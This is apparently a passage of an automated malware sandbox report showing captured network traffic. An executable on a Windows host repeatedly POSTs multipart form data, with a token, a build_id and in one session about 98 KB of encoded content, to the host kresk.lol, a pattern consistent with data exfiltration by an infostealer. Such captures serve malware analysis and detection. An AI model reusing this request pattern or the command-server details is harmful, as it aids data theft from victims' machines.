                                                                                                                                                                      2024-12-04 16:05:19 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 39 48 34 57 34 57 4c 58 42 41 49 45 4b 36 50 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 39 48 34 57 34 57 4c 58 42 41 49 45 4b 36 50 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 39 48 34 57 34 57 4c 58 42 41 49 45 4b 36 50 50 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQ9H4W4WLXBAIEK6PPHDContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQ9H4W4WLXBAIEK6PPHDContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQ9H4W4WLXBAIEK6PPHDCont
2024-12-04 16:05:20 UTC | 158               | IN        | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 04 Dec 2024 16:05:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
2024-12-04 16:05:20 UTC | 12                | IN        | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 2ok0


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
29         | 192.168.2.4 | 49832       | 159.69.102.165 | 443              | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-04 16:05:20 UTC | 317               | OUT       | POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----R1D26XB16P8QIECJWLNO
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
    Host: kresk.lol
    Content-Length: 1825
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-04 16:05:20 UTC | 1825 | OUT | Data Raw: (hex dump omitted)
                                                                                                                                                                      Data Ascii: ------R1D26XB16P8QIECJWLNOContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------R1D26XB16P8QIECJWLNOContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------R1D26XB16P8QIECJWLNOCont
2024-12-04 16:05:21 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:21 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.4 | 49836 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:22 UTC | 317 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----NOZUKFCT00ZUAAA1VKFU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 1825
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:22 UTC | 1825 | OUT | Data Raw: (hex dump omitted)
                                                                                                                                                                      Data Ascii: ------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------NOZUKFCT00ZUAAA1VKFUCont
2024-12-04 16:05:23 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:23 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.4 | 49838 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:23 UTC | 317 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----NOZUKFCT00ZUAAA1VKFU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:23 UTC | 1837 | OUT | Data Raw: (hex dump omitted)
                                                                                                                                                                      Data Ascii: ------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------NOZUKFCT00ZUAAA1VKFUCont
2024-12-04 16:05:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49841 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:25 UTC | 317 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:25 UTC | 1837 | OUT | Data Raw: (hex dump omitted)
                                                                                                                                                                      Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------R90RQ9HL6P8YU3ECJMOPCont
2024-12-04 16:05:26 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:26 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49842 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:26 UTC | 317 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----R90RQ9HL6P8YU3ECJMOP
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:26 UTC | 1837 | OUT | Data Raw: (hex dump omitted)
                                                                                                                                                                      Data Ascii: ------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------R90RQ9HL6P8YU3ECJMOPContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------R90RQ9HL6P8YU3ECJMOPCont
2024-12-04 16:05:27 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:27 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49846 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:28 UTC | 317 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----X4WTRQIMYUSJM7YMOHDT
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 1837
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:28 UTC | 1837 | OUT | Data Raw: (hex dump omitted)
                                                                                                                                                                      Data Ascii: ------X4WTRQIMYUSJM7YMOHDTContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------X4WTRQIMYUSJM7YMOHDTContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------X4WTRQIMYUSJM7YMOHDTCont
2024-12-04 16:05:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 Dec 2024 16:05:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-04 16:05:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49849 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:29 UTC | 316 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----AASR9H47QQ9ZUASRQ90H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Host: kresk.lol
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-04 16:05:29 UTC | 453 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 41 41 53 52 39 48 34 37 51 51 39 5a 55 41 53 52 51 39 30 48 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------AASR9H47QQ9ZUASRQ90HContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------AASR9H47QQ9ZUASRQ90HContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------AASR9H47QQ9ZUASRQ90HCont
2024-12-04 16:05:30 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:30 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
2024-12-04 16:05:30 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49856 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:32 UTC | 318 | OUT | POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----VA16PHVSJEKNYMGDTRIE
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 98813
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
2024-12-04 16:05:32 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 56 41 31 36 50 48 56 53 4a 45 4b 4e 59 4d 47 44 54 52 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------VA16PHVSJEKNYMGDTRIEContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------VA16PHVSJEKNYMGDTRIECont
2024-12-04 16:05:32 UTC | 16355 | OUT | Data Raw: 69 69 6b 41 6c 46 4c 52 69 67 42 4b 53 6c 70 4b 42 68 51 61 4b 4b 59 78 4b 4b 57 69 6b 41 6c 46 4c 69 6b 6f 41 53 69 6c 70 4b 42 69 55 55 74 4a 51 4d 4b 53 6c 70 44 51 41 55 6c 4c 52 54 41 53 6b 4e 4c 52 51 4e 43 55 47 69 6a 46 41 78 4b 4b 57 6b 6f 41 4b 53 6c 70 4b 59 78 4b 51 30 36 6b 6f 47 4a 52 53 30 6c 41 78 4b 4b 57 6b 49 6f 41 53 67 30 55 55 61 44 45 6f 6f 6f 6f 47 4a 53 55 36 6b 78 52 63 42 4b 53 6e 59 70 70 6f 47 46 4a 53 30 55 44 47 6d 69 6c 70 4b 42 68 32 70 4b 58 46 4a 69 67 59 6c 4a 54 71 54 46 49 42 4b 53 6c 36 30 6c 41 78 4f 39 4a 32 70 31 49 52 51 55 49 61 53 6e 47 6b 49 6f 47 4e 36 47 69 6c 4e 4a 31 6f 41 54 72 53 45 55 37 47 4b 61 52 51 55 46 49 65 52 53 34 70 50 6f 4d 55 41 46 4a 53 34 35 7a 52 51 4d 62 52 53 30 6e 66 2b 74 41 78 44 79
                                                                                                                                                                      Data Ascii: iikAlFLRigBKSlpKBhQaKKYxKKWikAlFLikoASilpKBiUUtJQMKSlpDQAUlLRTASkNLRQNCUGijFAxKKWkoAKSlpKYxKQ06koGJRS0lAxKKWkIoASg0UUaDEooooGJSU6kxRcBKSnYppoGFJS0UDGmilpKBh2pKXFJigYlJTqTFIBKSl60lAxO9J2p1IRQUIaSnGkIoGN6GilNJ1oATrSEU7GKaRQUFIeRS4pPoMUAFJS45zRQMbRS0nf+tAxDy
2024-12-04 16:05:32 UTC | 16355 | OUT | Data Raw: 6a 4b 6b 73 4b 38 47 33 70 65 36 39 65 71 2b 66 39 62 6e 4a 5a 72 6f 66 42 45 38 73 58 69 2b 78 45 52 2b 2b 7a 49 77 39 56 4b 6e 50 2b 50 34 55 79 62 77 50 34 6a 68 6e 38 72 2b 7a 6e 66 6e 41 64 48 55 71 66 78 7a 78 2b 4e 64 4e 34 65 30 4f 50 77 72 4f 62 6e 55 4a 59 6e 31 5a 34 7a 35 4e 74 47 64 33 6c 4b 65 72 4e 2f 4c 2f 48 74 39 62 6d 4f 59 59 61 6a 68 5a 7a 6c 4a 4e 57 5a 6e 68 63 4e 57 6c 57 69 72 57 31 4e 4b 36 43 70 65 54 49 76 33 56 6b 59 44 36 5a 72 41 38 53 41 47 77 69 50 63 53 67 66 6f 61 31 79 78 4a 4a 4a 79 54 79 61 35 2f 77 41 52 7a 67 74 44 41 44 30 79 37 66 30 2f 72 58 35 4e 77 7a 47 56 62 4f 4b 54 68 30 62 66 6f 72 50 2f 41 49 59 2b 6f 34 68 6e 47 6c 6c 6c 54 6d 36 70 4c 35 33 52 68 55 6e 4e 4c 52 58 37 57 66 6b 59 55 55 55 55 41 65 72 4d
                                                                                                                                                                      Data Ascii: jKksK8G3pe69eq+f9bnJZrofBE8sXi+xER++zIw9VKnP+P4UybwP4jhn8r+znfnAdHUqfxzx+NdN4e0OPwrObnUJYn1Z4z5NtGd3lKerN/L/Ht9bmOYYajhZzlJNWZnhcNWlWirW1NK6CpeTIv3VkYD6ZrA8SAGwiPcSgfoa1yxJJJyTya5/wARzgtDAD0y7f0/rX5NwzGVbOKTh0bforP/AIY+o4hnGlllTm6pL53RhUnNLRX7WfkYUUUUAerM
2024-12-04 16:05:32 UTC | 16355 | OUT | Data Raw: 47 6d 47 6e 63 39 4f 31 4e 4a 35 6f 62 4e 45 4a 6e 67 34 70 75 66 78 70 54 30 70 70 36 35 71 47 55 67 7a 54 63 2b 6c 42 50 50 65 6b 49 71 53 68 44 36 30 6e 4e 4b 65 6c 4a 79 50 77 71 57 55 68 42 31 35 70 44 37 30 6f 35 6f 49 46 53 4d 54 39 4b 53 6a 71 66 65 67 6e 2f 49 70 44 45 50 4e 49 61 4d 55 6d 61 51 37 42 31 50 38 41 53 6b 50 54 4e 48 2b 65 61 4f 31 49 6f 39 41 6f 6f 6f 72 41 2b 55 43 69 75 74 74 50 42 61 33 56 6c 42 63 66 32 6b 71 65 62 47 72 37 66 4a 4a 78 6b 5a 78 31 71 4f 66 77 76 70 6c 72 4d 30 4e 78 34 6d 73 49 5a 56 78 6d 4f 55 71 72 44 49 79 4d 67 74 6e 6f 61 38 65 4f 62 78 6b 37 4b 44 5a 39 46 4c 68 79 70 46 58 64 52 49 35 61 69 75 6c 2f 34 52 2f 52 66 2b 68 73 30 76 38 41 37 2b 4a 2f 38 58 56 79 30 38 45 51 58 38 52 6c 73 39 63 74 72 69 4d
                                                                                                                                                                      Data Ascii: GmGnc9O1NJ5obNEJng4pufxpT0pp65qGUgzTc+lBPPekIqShD60nNKelJyPwqWUhB15pD70o5oIFSMT9KSjqfegn/IpDEPNIaMUmaQ7B1P8ASkPTNH+eaO1Io9AooorA+UCiuttPBa3VlBcf2kqebGr7fJJxkZx1qOfwvplrM0Nx4msIZVxmOUqrDIyMgtnoa8eObxk7KDZ9FLhypFXdRI5aiul/4R/Rf+hs0v8A7+J/8XVy08EQX8Rls9ctriM
2024-12-04 16:05:32 UTC | 16355 | OUT | Data Raw: 4a 52 53 55 55 44 46 4e 4a 51 54 52 6d 6d 67 51 6c 4c 53 41 34 6f 6f 41 4b 4f 4b 43 61 54 4e 4d 70 43 68 6d 51 2f 4b 78 58 36 4e 55 79 58 6c 79 68 2b 57 5a 2f 78 4f 61 72 6b 30 6d 61 4f 57 34 47 67 75 71 33 53 39 53 6a 66 56 61 6c 58 57 50 2b 65 6c 72 47 33 75 4b 79 69 61 54 4e 48 73 6f 73 4f 55 32 30 31 4f 78 59 2f 50 42 4b 76 2b 36 32 61 73 4a 63 36 5a 4a 2f 79 38 76 47 66 39 74 4b 35 6f 79 4b 74 4e 4d 2f 6f 4b 6c 30 46 33 44 32 62 65 78 31 79 77 32 38 68 78 44 66 51 48 32 4c 59 71 39 61 32 54 32 36 7a 79 4d 36 46 66 4a 62 42 56 75 2b 4b 38 2b 65 59 35 70 71 33 4d 79 5a 32 79 4f 75 65 4d 41 31 6c 4f 68 4a 71 79 6b 4e 34 65 54 57 34 32 54 37 78 36 56 48 39 61 64 6e 4f 50 53 6d 6e 30 2f 57 75 69 35 31 70 61 43 45 38 55 68 2f 47 6a 70 33 6f 70 46 49 62 51
                                                                                                                                                                      Data Ascii: JRSUUDFNJQTRmmgQlLSA4ooAKOKCaTNMpChmQ/KxX6NUyXlyh+WZ/xOark0maOW4Gguq3S9SjfValXWP+elrG3uKyiaTNHsosOU201OxY/PBKv+62asJc6ZJ/y8vGf9tK5oyKtNM/oKl0F3D2bex1yw28hxDfQH2LYq9a2T26zyM6FfJbBVu+K8+eY5pq3MyZ2yOueMA1lOhJqykN4eTW42T7x6VH9adnOPSmn0/Wui51paCE8Uh/Gjp3opFIbQ
2024-12-04 16:05:32 UTC | 16355 | OUT | Data Raw: 6f 41 53 67 39 4b 4f 67 70 4d 2b 39 42 51 6c 47 61 4b 4d 66 57 67 41 2b 74 4a 31 37 30 76 57 6b 79 42 53 47 49 61 44 36 55 48 69 6b 70 6a 44 6a 48 2b 46 42 36 43 6a 70 51 63 55 44 45 36 30 6d 4f 32 4d 30 37 76 36 55 6c 41 43 48 6d 6a 72 52 6e 6b 69 69 67 59 67 36 30 55 76 66 33 70 50 70 31 6f 41 51 30 55 55 48 72 51 4d 39 45 6f 6f 6f 72 4d 2b 52 4e 2f 77 64 2f 79 48 6c 2f 36 35 74 2f 53 76 52 59 6b 6a 4c 62 54 45 68 4a 50 6f 4b 38 36 38 48 66 38 68 35 66 2b 75 62 66 30 72 30 49 74 49 76 7a 51 6f 73 6b 67 2b 36 72 4e 74 42 50 31 77 63 56 38 50 6e 30 6d 73 77 6a 62 73 76 7a 5a 39 2f 77 32 76 39 67 66 71 2f 79 51 39 37 58 35 2b 49 59 69 44 2f 44 79 68 2f 4d 5a 71 74 63 61 62 42 71 4d 45 31 6a 63 43 53 4c 63 42 39 78 73 35 48 42 79 43 52 36 2b 31 50 47 71 6c
                                                                                                                                                                      Data Ascii: oASg9KOgpM+9BQlGaKMfWgA+tJ170vWkyBSGIaD6UHikpjDjH+FB6CjpQcUDE60mO2M07v6UlACHmjrRnkiigYg60Uvf3pPp1oAQ0UUHrQM9EooorM+RN/wd/yHl/65t/SvRYkjLbTEhJPoK868Hf8h5f+ubf0r0ItIvzQoskg+6rNtBP1wcV8Pn0mswjbsvzZ9/w2v9gfq/yQ97X5+IYiD/Dyh/MZqtcabBqME1jcCSLcB9xs5HByCR6+1PGql
2024-12-04 16:05:32 UTC | 683 | OUT | Data Raw: 37 77 58 6b 64 78 4b 6c 30 72 2b 59 4a 6c 63 68 77 2b 63 37 67 65 75 63 39 36 56 68 33 4f 7a 30 54 55 37 33 51 39 48 76 72 71 39 76 5a 49 39 49 6e 46 7a 44 62 36 65 50 75 33 30 7a 4c 74 4a 5a 52 77 56 54 63 70 4c 4e 30 77 41 75 54 6e 44 6f 56 31 58 54 59 64 49 30 50 52 72 72 37 48 65 72 41 2b 70 58 31 79 47 32 2f 5a 39 36 63 4d 57 47 53 75 79 48 42 79 4f 66 6e 59 44 6b 38 38 7a 5a 2b 4a 2f 45 47 6e 32 76 32 57 79 31 7a 55 72 65 32 79 54 35 4d 56 30 36 70 7a 31 2b 55 48 48 50 66 31 71 4e 66 45 47 73 52 36 76 4e 71 73 4f 70 58 55 46 2f 4d 54 76 75 4c 65 55 78 4d 63 39 52 38 75 4d 44 70 77 4f 4f 42 52 59 4c 6e 70 30 47 75 7a 58 5a 6a 31 4c 51 5a 37 69 53 34 6d 31 71 79 73 4c 69 35 32 6c 5a 4c 79 4e 59 63 5a 6b 48 63 53 4d 47 4a 42 36 34 47 65 52 57 58 66 53
                                                                                                                                                                      Data Ascii: 7wXkdxKl0r+YJlchw+c7geuc96Vh3Oz0TU73Q9Hvrq9vZI9InFzDb6ePu30zLtJZRwVTcpLN0wAuTnDoV1XTYdI0PRrr7HerA+pX1yG2/Z96cMWGSuyHByOfnYDk88zZ+J/EGn2v2Wy1zUre2yT5MV06pz1+UHHPf1qNfEGsR6vNqsOpXUF/MTvuLeUxMc9R8uMDpwOOBRYLnp0GuzXZj1LQZ7iS4m1qysLi52lZLyNYcZkHcSMGJB64GeRWXfS
2024-12-04 16:05:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:34 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
2024-12-04 16:05:34 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49864 | 159.69.102.165 | 443 | 8080 | C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-04 16:05:36 UTC | 316 | OUT | POST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BS2D2V3W4EUAAIWBIWT2
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
2024-12-04 16:05:36 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 53 32 44 32 56 33 57 34 45 55 41 41 49 57 42 49 57 54 32 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------BS2D2V3W4EUAAIWBIWT2Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------BS2D2V3W4EUAAIWBIWT2Cont
2024-12-04 16:05:37 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:36 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
2024-12-04 16:05:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
